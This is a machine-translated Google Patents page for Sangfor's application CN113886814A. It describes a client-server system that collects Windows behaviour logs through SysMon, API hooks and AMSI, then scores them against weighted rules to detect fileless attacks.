CN113886814A - Attack detection method and related device - Google Patents

Attack detection method and related device Download PDF

Info

Publication number
CN113886814A
CN113886814A CN202111152699.XA CN202111152699A CN113886814A CN 113886814 A CN113886814 A CN 113886814A CN 202111152699 A CN202111152699 A CN 202111152699A CN 113886814 A CN113886814 A CN 113886814A
Authority
CN
China
Prior art keywords
behavior
attack
log
file
matching
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202111152699.XA
Other languages
Chinese (zh)
Inventor
叶昌健
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sangfor Technologies Co Ltd
Original Assignee
Sangfor Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sangfor Technologies Co Ltd filed Critical Sangfor Technologies Co Ltd
Priority to CN202111152699.XA priority Critical patent/CN113886814A/en
Publication of CN113886814A publication Critical patent/CN113886814A/en
Pending legal-status Critical Current

Links

Images

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Hardware Design (AREA)
  • Physics & Mathematics (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Debugging And Monitoring (AREA)
  • Computer And Data Communications (AREA)

Abstract

The application discloses an attack detection method, which comprises the following steps: acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information; performing feature extraction on the behavior log to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics; and carrying out attack detection based on the behavior characteristics to obtain a detection result. Attack detection is carried out on various different behavior logs and different behavior characteristics instead of only static files, so that the attack detection range is widened, and the attack detection effect is improved. The application also discloses an attack detection device, a server and a computer readable storage medium, which have the beneficial effects.

Description

Attack detection method and related device
Technical Field
The present application relates to the field of computer security technologies, and in particular, to an attack detection method, an attack detection apparatus, a server, and a computer-readable storage medium.
Background
With the continuous development of information technology, the information security problem in various industries is more and more important. Therefore, when an information system is built or an information technology is used, what corresponding security solution is used needs to be considered first to avoid the security problem.
In the related art, the file-based static scanning method can scan dangerous contents in a file and remove threats so as to avoid the file-based security problem. However, this security solution is extremely difficult to detect a file-free attack when an attack strategy based on a file-free attack is present. Attackers increasingly bypass various security solutions through a file-free attack method, so that malicious software invasion based on file-free attack is difficult to detect, and the attack detection effect is reduced.
Therefore, how to improve the detection effect of the attack is a key issue to be focused on by those skilled in the art.
Disclosure of Invention
The application aims to provide an attack detection method, an attack detection device, a server and a computer readable storage medium, so as to improve the attack detection effect and keep the safety and reliability of a system.
In order to solve the above technical problem, the present application provides an attack detection method, including:
acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
performing feature extraction on the behavior log to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and carrying out attack detection based on the behavior characteristics to obtain a detection result.
Optionally, the obtaining the behavior log includes:
and acquiring the behavior log through a system monitoring tool and/or an interface hook and/or an anti-malware scanning interface.
Optionally, performing attack detection based on the behavior characteristics to obtain a detection result, including:
matching the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result;
and carrying out attack score calculation on the matching result to obtain the detection result.
Optionally, matching the behavior features based on a plurality of file-free attack matching rules to obtain a matching result, including:
setting an independent sub-process for each file attack-free matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights;
performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result;
correspondingly, calculating the attack score of the matching result to obtain the detection result, wherein the calculation comprises the following steps:
and carrying out attack score calculation on the matching result based on the weight of each subprocess to obtain the detection result.
Optionally, the method further includes:
extracting matched rules and matched features in the matching result;
matching a danger level based on the score of the detection result;
and performing summary generation processing based on the matched rule, the matched features and the danger level to obtain an analysis summary.
Optionally, the method further includes:
and carrying out abnormal attack processing based on the detection result.
Optionally, the method further includes:
performing suspicious log summarizing processing based on the detection result to obtain a suspicious behavior log;
and displaying the suspicious logs through a visual management platform.
The present application further provides an attack detection apparatus, including:
the behavior log acquisition module is used for acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
the behavior characteristic extraction module is used for extracting the characteristics of the behavior log to obtain behavior characteristics; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and the file-free attack detection module is used for carrying out attack detection based on the behavior characteristics to obtain a detection result.
The present application further provides a server, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the attack detection method as described above when executing the computer program.
The present application also provides a computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements the steps of the attack detection method as described above.
The application provides an attack detection method, which comprises the following steps: acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information; performing feature extraction on the behavior log to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics; and carrying out attack detection based on the behavior characteristics to obtain a detection result.
The behavior log is obtained, the behavior log is subjected to feature extraction to obtain behavior features, attack detection is carried out on the behavior features to obtain a detection result, wherein the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and frame behavior information, the behavior features comprise one or more combinations of memory buffer region features, execution context features, process dump file features and abnormal load features, attack detection on various different behavior logs and different behavior features is realized instead of only performing attack detection through a static file, the attack detection range is improved, and the attack detection effect is improved.
The present application further provides an attack detection apparatus, a server, and a computer-readable storage medium, which have the above beneficial effects, and are not described herein again.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings needed to be used in the description of the embodiments or the prior art will be briefly introduced below, it is obvious that the drawings in the following description are only embodiments of the present application, and for those skilled in the art, other drawings can be obtained according to the provided drawings without creative efforts.
Fig. 1 is a flowchart of an attack detection method provided in an embodiment of the present application;
fig. 2 is a flowchart of another attack detection method provided in the embodiment of the present application;
fig. 3 is a schematic structural diagram of an attack detection apparatus according to an embodiment of the present application.
Detailed Description
The core of the application is to provide an attack detection method, an attack detection device, a server and a computer readable storage medium, so as to improve the attack detection effect and keep the safety and reliability of the system.
In order to make the objects, technical solutions and advantages of the embodiments of the present application clearer, the technical solutions in the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is obvious that the described embodiments are some embodiments of the present application, but not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
In the related art, the file-based static scanning method can scan dangerous contents in a file and remove threats so as to avoid the file-based security problem. However, this security solution is extremely difficult to detect a file-free attack when an attack strategy based on a file-free attack is present. Attackers increasingly bypass various security solutions through a file-free attack method, so that malicious software invasion based on file-free attack is difficult to detect, and the attack detection effect is reduced.
Therefore, the attack detection method provided by the application obtains the behavior log, extracts the characteristics of the behavior log to obtain the behavior characteristics, and finally performs attack detection on the behavior characteristics to obtain the detection result, wherein the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information, and the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics, so that attack detection on various different behavior logs and different behavior characteristics is realized instead of performing attack detection only through a static file, the attack detection range is widened, and the attack detection effect is improved.
An attack detection method provided by the present application is described below by an embodiment.
Referring to fig. 1, fig. 1 is a flowchart of an attack detection method according to an embodiment of the present disclosure.
In this embodiment, the method may include:
s101, acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
it can be seen that the present alternative scheme mainly illustrates how behavior log collection is performed. Wherein the behavior log comprises one or more of system behavior information, process behavior information, script behavior information and framework behavior information. That is, in this embodiment, a behavior log of any one of the system behavior information, the process behavior information, the script behavior information, and the framework behavior information may be acquired, or the system behavior information, the process behavior information, the script behavior information, and the framework behavior information may all be acquired. However, no matter a certain behavior log is obtained, the condition that the related data is only collected in the static file is avoided, the range of obtaining the detection related data is enlarged, the range of attack detection is also enlarged, and the range of attack detection is not limited any more.
The system behavior information refers to acquiring various behavior logs of a system and a process from a system level;
the process behavior information refers to a behavior log related to a process acquired from a process level;
the script behavior information refers to behavior logs related to the script acquired from a script execution level;
the frame behavior information refers to acquiring a behavior log related to the frame operation from a frame operation layer.
Further, in this step, when the behavior log includes system behavior information, the step of obtaining the behavior log may include:
step 1, recording system behavior information of a process, a registry and a network through a system monitoring tool to obtain the system behavior information;
and 2, taking the system behavior information as a behavior log.
It can be seen that the present alternative scheme mainly illustrates how to perform behavior log collection through the path of the system. In the alternative, the system monitoring tool records the system behavior information of the process, the registry and the network to obtain the system behavior information, and the system behavior information is used as a behavior log. Obviously, in the alternative, the system behavior information is obtained by mainly recording the system behavior information through a process, a registry and a network at the system level. The behavior log collection is realized at the system level, the accuracy and the reliability of obtaining the behavior log are improved, various system behaviors can be judged from the system level even if the attack detection is not carried out by using files, and the judgment and the detection of the file-free behaviors or the file-free behaviors are realized.
The system monitoring tool can adopt a system monitor and a process monitor provided by the system.
Further, in this step, when the behavior log includes the process behavior information, the step of obtaining the behavior log includes:
step 1, performing interface call monitoring on each process through an interface hook to obtain process behavior information;
and 2, taking the process behavior information as a behavior log.
It can be seen that the present alternative solution mainly describes how to perform behavior log collection through the path of the process. In the alternative, interface call monitoring is performed on each process through an interface hook to obtain process behavior information, and the process behavior information is used as a behavior log. Therefore, in the alternative scheme, the process called by the interface of each process is mainly monitored through the set interface hook to obtain the process behavior information, namely, the behavior of the calling interface of the process is collected to obtain the process behavior information, and finally the process behavior information is used as a behavior log. The behavior logs are collected on each process level, and attack operation caused by injection of a target process without file attack is avoided.
Further, the present alternative may be based on a lightweight process injection monitor. The program is started automatically along with the startup, injected into a newly created process of the system, monitors a sensitive API calling process from API granularity through an API (Application Programming Interface) Hook function technology, and records information such as a calling chain, calling parameters and return values of the API.
Further, in this step, when the behavior log includes script behavior information and framework behavior information, the step of obtaining the behavior log includes:
step 1, intercepting and recording a called script and an executed module based on a framework through an anti-malware scanning interface to obtain script behavior information and framework behavior information;
and 2, taking the dynamic behavior log as a behavior log.
It can be seen that the present alternative scheme mainly explains how to perform behavior log collection through the script and framework of the process. In the alternative scheme, the invoked script and the executed module based on the framework are intercepted and recorded through the anti-malware scanning interface to obtain script behavior information and framework behavior information, and the dynamic behavior log is used as the behavior log.
In the alternative, the monitor may be dynamically executed based on a Windows AMSI (anti malware Scan Interface) Interface. The detection using the AMSI interface is mainly aimed at countering script-based and.net Framework-based attack detection, covering two sub-items of no-file attacks. That is, based on the interface provided by the current computer system, the corresponding script behavior information and frame behavior information may be obtained and used as the behavior log.
S102, extracting characteristics of the behavior log to obtain behavior characteristics; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
on the basis of S101, this step aims to perform feature extraction on the behavior log to obtain behavior features. Therefore, the method aims to extract the characteristics of the behavior log on the basis of acquiring the behavior log, reduce the influence of excessive redundancy in the behavior log on attack detection and improve the detection precision and accuracy. The behavior characteristics comprise one or more of the combination of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics.
The method for extracting the features of the behavior log may be any one of the feature extraction methods provided in the prior art, or may select the corresponding feature extraction method according to the difference between the detection angle and the detection type, or may select the corresponding feature extraction method according to the rule of behavior log appearance, which is not specifically limited herein.
Further, in this step, a feature extraction manner may be determined according to a detection purpose, so as to obtain feature data required in the detection step from the behavior log and remove redundant and useless behavior data. For example, when the purpose of attack detection is to detect a network attack, network-related data in the behavior log is extracted to obtain behavior features. When the purpose of attack detection is to detect system attacks, log data related to system call or system operation in the behavior log is extracted to obtain behavior characteristics. When the purpose of attack detection is to detect data attacks, log data related to data operation and database operation in the behavior log are extracted to obtain behavior characteristics. It can be seen that, when the feature extraction mode determined according to the detection purpose is not unique, a suitable feature extraction mode can be selected according to a specific requirement, and is not specifically limited herein.
Furthermore, in the step, a feature extraction mode can be determined according to an attack mode of the security attack, so that a proper feature extraction mode is selected according to the attack mode, and further, the feature extraction and the attack detection are performed on the attack mode in a more targeted manner. For example, if the attack mode is a mode without file attack, the data of the memory buffer, the execution context, the process dump file and the suspicious payload in the behavior log can be taken as the extracted behavior characteristics aiming at the characteristics of the file-free attack, so as to determine the behavior of the file-free attack from the above data or the above data acquisition path without paying attention to the log data irrelevant to the file-free attack.
Furthermore, in the step, the feature extraction mode can be determined according to the rule or abnormality appearing in the behavior log. For example, the operation rule of the behavior log includes, but is not limited to, performing system level operation or accessing a specific network in a specific time period, accessing the network or saving corresponding data regularly after a certain operation, performing data saving after data reading and writing, and the like. Or, when an abnormal rule occurs in the behavior log, the abnormal rule includes an operation that occurs suddenly after the process or the program is executed regularly. For example, a certain object regularly performs reading and writing of local data, but suddenly accesses an external network and transmits data.
Based on the above description, the operation of performing feature extraction on the behavior log in this step is not unique, different feature extraction manners may be selected in different situations, and the feature extraction operations may also be performed in multiple manners in different situations, which is not specifically limited herein.
Further, in order to improve the effect of feature extraction and extract behavior features more conforming to the non-file attack features, the method may include:
step 1, analyzing the behavior log according to a log format corresponding to the behavior log to obtain log data;
and 2, extracting features from the log data based on the intrusion target features to obtain behavior features.
It can be seen that the present alternative is mainly to illustrate how feature extraction is performed. In the alternative scheme, the behavior log is analyzed according to a log format corresponding to the behavior log to obtain log data, and feature extraction is performed from the log data based on the intrusion target features to obtain behavior features; the intrusion target characteristics comprise one or more of the combination of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics. Wherein, the intrusion target feature can be a path feature of the file-free attack. That is, the file-free attack usually performs intrusion in the memory buffer, the execution context, the process dump file, and the abnormal load, and then implements the corresponding attack operation.
In addition, in this alternative, if feature extraction is performed on other types of attacks, feature extraction may also be performed using an attack path specific to the attack type, which is not specifically limited herein.
In the alternative scheme, the behavior characteristics are obtained by extracting the characteristics from the memory buffer, the execution context, the process dump file and the abnormal load. The behavior characteristics which are more consistent with the file-free attack characteristics can be obtained, the effectiveness and the precision of characteristic extraction are improved, and the characteristic data related to the file-free attack is effectively extracted.
And S103, carrying out attack detection based on the behavior characteristics to obtain a detection result.
On the basis of S102, this step aims to perform attack detection based on the behavior characteristics, and obtain a detection result. That is, on the basis of acquiring the behavior characteristics, attack detection may be performed based on an attack matching rule, or based on a machine learning model, or based on a behavior baseline.
The behavior characteristics are extracted from the acquired behavior log, so that the behavior characteristics of each system level or process level or script level or framework level in the system can be reflected, and the detection of the file is separated from the detection of each behavior characteristic in the system based on the characteristic layer without file attack.
The attack detection method is not unique, and may be selected according to a specific attack situation, which is not limited herein. Further, the detection mode can be selected according to the attack mode, can be determined according to a detection library used in the detection process, and can be determined according to the behavior characteristics.
Further, in order to improve the efficiency of detection and reduce the time delay of detection, the step may include:
step 1, matching the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result;
and 2, calculating attack scores of the matching results to obtain detection results.
It can be seen that this alternative is mainly illustrative of how the detection is performed. In the alternative scheme, the behavior characteristics are matched based on a plurality of non-file attack matching rules to obtain a matching result, and attack score calculation is performed on the matching result to obtain a detection result. The dimensions for matching the multiple non-file-attack matching rules include, but are not limited to, a process, a planning task, a system service, a network, a registry, a file, a WMI (Windows Management Instrumentation), and a memory. The matching result includes, but is not limited to, the number of matches to the matching rule, the type of matching rule, and the range of matching rules. Based on the data in the matching result, a weighted calculation or a weighted average calculation may be performed to obtain a corresponding detection result. When the attack score is larger than the threshold value, the attack can be judged to occur, when the attack score is within a certain range, the risk can be judged to exist, and when the attack score is smaller than the safety threshold value, the safety can be judged to be safe.
Further, based on the matching process, the efficiency of matching is further improved, and the accuracy of result matching is improved, where the last alternative may include:
step 1, setting independent sub-processes for each non-file attack matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights;
step 2, performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result;
and 3, calculating attack scores of the matching results based on the weight of each subprocess to obtain detection results.
It can be seen that the present alternative scheme mainly explains how to obtain the detection result again. In the alternative, an independent sub-process is set for each non-file attack matching rule; each subprocess corresponds to a file-free attack means, different weights are set for each subprocess, file-free attack matching is conducted on behavior characteristics based on each subprocess to obtain a matching result, and attack score calculation is conducted on the matching result based on the weight of each subprocess to obtain a detection result. The independent subprocesses are arranged for each file-free attack matching rule, so that the corresponding file-free attack matching rule is executed through the plurality of independent subprocesses, the rule matching efficiency can be effectively improved, and the time delay of the matching process is reduced.
Further, in order to improve the experience of the technician for viewing the matching result and improve the efficiency of information display, this embodiment may further include:
step 1, extracting matched rules and matched features in a matching result;
step 2, matching danger grades based on the scores of the detection results;
and 3, performing summary generation processing based on the matched rules, the matched features and the danger grades to obtain an analysis summary.
Therefore, the alternative scheme mainly explains how to obtain the analysis abstract. In the alternative scheme, matched rules and matched features in the matching results are extracted, risk levels are matched based on scores of the detection results, and abstract generation processing is performed based on the matched rules, the matched features and the risk levels to obtain analysis abstract.
The matched rules and the matched features can be obviously displayed through the analysis abstract, and the current danger level is further displayed, so that the danger information can be visually displayed.
Further, the technical solution of this embodiment may further include:
and carrying out abnormal attack processing based on the detection result.
Therefore, the alternative scheme mainly explains that abnormal attack processing can be performed on the detection result, namely, processing is performed according to the detection result, and larger influence caused by file-free attack is avoided. The adopted abnormal attack processing may adopt any one of processing modes provided by the prior art, and is not specifically limited herein.
Further, the technical solution of this embodiment may further include:
step 1, performing suspicious log summarizing processing based on a detection result to obtain a suspicious behavior log;
and 2, displaying the suspicious logs through a visual management platform.
Therefore, in the alternative, the suspicious behavior log is mainly shown at the end of the detection process, so that the detection result can be conveniently consulted and managed by technicians. In the alternative scheme, the suspicious logs are subjected to summarizing processing based on the detection results to obtain suspicious behavior logs, and the suspicious logs are displayed through the visual management platform.
In addition, in the present embodiment, in order to improve the efficiency of performing attack detection, the present embodiment may also be provided in the form of a client and a server. The operation of behavior log collection is executed in the client, the processes of feature extraction and attack detection can be executed in the server, a communication mode of branch execution is realized, the detection efficiency is improved, the occupation of excessive performance resources of the client is avoided, and the detection efficiency is improved.
In summary, in this embodiment, a behavior log is obtained, feature extraction is performed on the behavior log to obtain a behavior feature, and finally attack detection is performed on the behavior feature to obtain a detection result, where the behavior log includes one or a combination of multiple types of system behavior information, process behavior information, script behavior information, and frame behavior information, and the behavior feature includes one or a combination of multiple types of memory buffer feature, execution context feature, process dump file feature, and abnormal load feature, so that attack detection is performed on multiple different behavior logs and different behavior features, instead of performing attack detection only on a static file, an attack detection range is increased, and an attack detection effect is improved.
Furthermore, in a more practical application environment, it is necessary to effectively detect the attack without the file, improve the efficiency of detection, and reduce the time delay of detection. The attack detection method provided by the present application is further described below by a specific embodiment.
Referring to fig. 2, fig. 2 is a flowchart of another attack detection method according to an embodiment of the present application.
In this embodiment, the attack detection process is split into the execution of the client and the execution of the master control end. The method comprises the steps of collecting behavior logs in a client, and extracting characteristics of the behavior logs and detecting attacks in a server.
Furthermore, a Client/Server communication module is adopted, and the Client/Server communication module and the Server communication module are respectively operated on the Client and the Server. The system is a lightweight corollary program based on RESTful API (Representational State Transfer function mapping Interface, REST network Interface) communication and is responsible for providing data interaction service between a client and a main control end. The Client side communication module is also called an agent program, and realizes an original log data uploading component and a behavior handling mode receiving component. The Server side communication module also becomes a manager program, and realizes the corresponding receiving assembly of the original log data and the issuing assembly of the behavior processing mode. The system log and the suspicious Payload collected by the behavior log collection module are processed by an original log data uploading component of the Client communication module, the original log is analyzed and encoded into a data packet in a multipart/form-data (a request format), the data packet is uploaded to the Server communication module through a RESTful API, and the data packet is processed by an original log receiving component.
Based on this, the method may comprise:
s201, a client records system behavior information of a process, a registry and a network through a system monitoring tool to obtain the system behavior information;
in this step, the client may be monitored for real-time behavior and a log may be generated based on a System Monitor (SysMon) or a Process Monitor (ProcMon) behavior monitoring program. SysMon and ProcMen programs are system monitoring tools contained in a Windows Sysinternals tool set, can record system behavior information of multiple dimensions such as processes, registries and networks in real time, and cover main system behaviors. Both support the user-defined configuration file as a filter to primarily filter the behaviors to be filtered out from the system log, and the screened log information is the content of interest of the attack detection method in the embodiment and is also the sensitive system behavior which is possibly generated by a file-free attack method and used by an attacker, and is subsequently used for detecting malicious codes.
S202, the client monitors interface calling of each process through an interface hook to obtain process behavior information;
the step can be based on a lightweight process injection monitoring program. The program can be automatically started along with the startup, injected into a newly created process of the system, monitors the sensitive API calling process from the API granularity through the API Hook technology, and records the information of calling chains, calling parameters, return values and the like of the API. The purpose of the component is to monitor process injection sensitive API calls that may be utilized in a no-file attack, determine code injection behaviors that may exist in the process through API call chain relationships, and extract suspicious call parameters and memory buffers for subsequent detection.
S203, the client intercepts the used script and the executed module based on the framework through the anti-malware scanning interface and records the intercepted script and the executed module to obtain script behavior information and framework behavior information;
the step can be based on dynamic execution monitoring program of Windows AMSI interface. The detection purpose of using the AMSI interface is mainly used for resisting attack detection based on script and NET Framework, and two sub items of file-free attack are covered. The Script-based file-free attack types mainly include Powershell (a command line shell program and a Script environment), Jscript (a Script language), VBScript (Visual Basic Script language) and VBA (Visual Basic macro language), and the AMSI can intercept the four Script types called in various modes in the system for subsequent detection; NET Framework-based malicious modules are also often loaded and executed in a memory by an attacker in a file-free manner, and an AMSI interface can intercept potential malicious modules in the form of data streams for subsequent detection. Since the AMSI interface is only introduced after Windows 10 and Windows Server2016, Windows 8.1 and following versions of the system do not have this component available, which can be removed/castrated in the lower version of Windows due to the modular nature. In order to ensure complete collection of script type commands, a dynamic monitoring program similar to an AMSI interface working mode needs to be implemented on a Windows 7-Windows 8.1 machine in other modes to perform dynamic monitoring.
S204, the client takes the system behavior information, the process behavior information, the script behavior information and the frame behavior information as behavior logs;
s205, the main control end analyzes the behavior log according to the log format corresponding to the behavior log to obtain log data;
s206, the master control end extracts features from the log data based on the intrusion target features to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
in this step, a memory Buffer, an execution context, a process dump, a suspicious Payload, and the like in log data of the behavior log may be extracted and solidified into a feature file, and the feature file is transmitted to the attack feature determination component for subsequent determination.
S207, the main control end matches the behavior characteristics based on the file-free attack matching rule base to obtain a matching result; and carrying out attack score calculation on the matching result to obtain a detection result.
The step may be to scan the extracted behavior features and return whether a malicious behavior is matched. The file-free attack matching rule is written into independent subroutines, and each subroutine can be used for pertinently matching a file-free attack method and occupies a certain fractional weight. The detection dimension of the file-free attack matching rule is based on the input of a log acquisition module, can cover processes, planning tasks, system services, networks, registries, files, WMIs, memories and the like, and can also establish contexts in the matching rule to realize multi-factor matching between different dimensions. The flow of the attack characteristic detection may be that firstly, the extracted characteristic files of the plurality of behavior characteristics are received, then a group of non-file attack matching rules are adopted to respectively scan and weight malicious items possibly existing in the attack characteristic files to obtain attack scores, and when the attack scores are larger than a threshold value, the file attack can be judged to be non-file attack. In addition, an analysis abstract can be generated so that technicians can refer to the analysis abstract, matched file-free attack characteristic rules and matched characteristic file contents are marked in the analysis abstract, and the analysis abstract is divided into high-risk, medium-risk and low-risk levels through attack scores.
The operation process is fully automatic, has higher detectable rate for the file-free attack with very obvious malicious characteristics, supports automatic processing of high-risk log alarm, automatically issues treatment results, and proposes technical personnel to perform intervention analysis and execute relieving measures for the log alarm behavior with the score in the middle-risk and low-order sections.
S208, the client performs abnormal attack treatment based on the detection result.
In this step, the client executes response handling on the client for the handling mode issued by the master control end, the master control end performs corresponding processing on the reported suspicious log, and the issued handling command covers system dimensions such as process operation, scheduled task operation, system service operation, network operation, registry operation, file operation, WMI operation and the like, including mitigation measures for file-free attack behaviors such as stopping, deleting, blocking IP and the like.
Automated handling may also be performed based on the configuration file. The obviously high-risk sensitive system behaviors can be directly intercepted and the processing result can be reported through the preset configuration file or the configuration file issued by the main control end. The file-free attack judgment process can be completed on the client, the file-free attack processing flow can be shortened, and partial network communication pressure and processing time are reduced. For some log rules with high doubt or false alarm rate, only alarms are generated on a client through predefining of configuration files but interception is not automatically executed, technicians manually confirm whether behavior treatment needs to be executed or not, and the alarms are eliminated after relieving measures are manually executed.
In addition, in this embodiment, the suspicious log may be summarized based on the detection result to obtain a suspicious behavior log; and displaying the suspicious logs through a visual management platform.
That is, the reported suspicious log behaviors are collected into a list form, and a Web console for a system administrator to complete functions of checking analysis results, performing behavior treatment, checking treatment results, adjusting system configuration and the like is provided, and the Web console mainly comprises a user interaction component, an environment configuration component and a data storage component.
The user interaction component is designed by adopting a popular B/S (Browser/Server) framework, and adopts a working mode of Browser request and Server response, so that technicians can access a control management interface of the system through the Browser, and the main part of the system function is completely erected at the Server end without consuming a large amount of resources locally to run core services. The client can be unified, the complete function which can be realized only by installing the client originally can be realized only by using a browser, and the system development is facilitated to be simplified, and the maintenance cost and the configuration difficulty are reduced. The user interaction component has the functions of basic user management, client management, log management, disposal management, version management, configuration file modification and the like, simultaneously realizes a user group permission mechanism (the user group permission of common administrators and user group permission of controllable clients and system configuration and the like are divided), supports simultaneous management of multiple users, and enables system administrators to log in a management interface through a browser or other terminals to conveniently participate in system management and control.
The environment configuration component is mainly composed of a plurality of configuration files in a config folder under the working directory of the system, is responsible for receiving the input of environment configuration items and is applied to other system components. Before the system runs, a system administrator needs to modify the configuration files of all the components, and the configuration files can be modified at the Web front end through the user interaction components. When the system runs, each module initializes each system component by reading the configuration items in the configuration file, and each component executes corresponding functions according to predefined configuration items, for example, the configuration file can be modified to specify a client IP address, a log screening rule, a communication module monitoring network port number, an attack feature storage location, and the like. After the system is operated, the configuration file is sent to each client, and the agent program is restarted to apply the latest configuration file.
The data storage component is responsible for providing storage service of the analyzed data and attack characteristic file, and providing an interface for a user to inquire database information, so that the user can look up the log records of the client in a system Web management interface. The data storage component receives a series of information data such as original log data, judgment results, treatment results and the like, an analysis result abstract of each log alarm is stored in a database, the extracted malicious Payload is stored in an independent folder corresponding to the log, the purpose of storing by using the database and a file system is to facilitate regular query of analysis data from the database and presentation of the analysis data to a user in a Web control end in an analysis abstract mode, and query and extraction from the file system can be facilitated when attack feature files need to be subjected to manual intervention analysis in a later traceability evidence obtaining link.
In this embodiment, a behavior log is obtained, feature extraction is performed on the behavior log to obtain behavior features, attack detection is performed on the behavior features to obtain a detection result, where the behavior log includes one or a combination of more of system behavior information, process behavior information, script behavior information, and framework behavior information, and the behavior features include one or a combination of more of a memory buffer feature, an execution context feature, a process dump file feature, and an abnormal load feature, so that attack detection is performed on multiple different behavior logs and different behavior features, instead of performing attack detection only on a static file, the scope of attack detection is increased, and the effect of attack detection is improved.
In the following, the attack detection device provided by the embodiment of the present application is introduced, and the attack detection device described below and the attack detection method described above may be referred to in correspondence with each other.
Referring to fig. 3, fig. 3 is a schematic structural diagram of an attack detection apparatus according to an embodiment of the present disclosure.
In this embodiment, the apparatus may include:
a behavior log collection module 100, configured to obtain a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
the behavior feature extraction module 200 is configured to perform feature extraction on the behavior log to obtain a behavior feature; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and the file-free attack detection module 300 is configured to perform attack detection based on the behavior characteristics to obtain a detection result.
Optionally, the behavior log collecting module 100 is specifically configured to obtain the behavior log through a system monitoring tool and/or an interface hook and/or an anti-malware scanning interface.
Optionally, the file-free attack detection module 300 is specifically configured to match the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result; and carrying out attack score calculation on the matching result to obtain a detection result.
Optionally, the file-free attack detection module 300 is specifically configured to set an independent sub-process for each file-free attack matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights; performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result; and carrying out attack score calculation on the matching result based on the weight of each subprocess to obtain a detection result.
Optionally, the apparatus may further include:
the abstract analysis module is used for extracting matched rules and matched features in the matching result; matching risk grades based on the scores of the detection results; and performing summary generation processing based on the matched rules, the matched features and the danger levels to obtain an analysis summary.
Optionally, the apparatus may further include:
and the attack handling module is used for carrying out abnormal attack handling based on the detection result.
Optionally, the apparatus may further include:
the log display module is used for summarizing and processing the suspicious logs based on the detection result to obtain suspicious behavior logs; and displaying the suspicious logs through a visual management platform.
An embodiment of the present application further provides a server, including:
a memory for storing a computer program;
a processor for implementing the steps of the attack detection method as described in the above embodiments when executing the computer program.
Embodiments of the present application further provide a computer-readable storage medium, where a computer program is stored on the computer-readable storage medium, and when the computer program is executed by a processor, the steps of the attack detection method according to the above embodiments are implemented.
The embodiments are described in a progressive manner in the specification, each embodiment focuses on differences from other embodiments, and the same and similar parts among the embodiments are referred to each other. The device disclosed by the embodiment corresponds to the method disclosed by the embodiment, so that the description is simple, and the relevant points can be referred to the method part for description.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative components and steps have been described above generally in terms of their functionality in order to clearly illustrate this interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
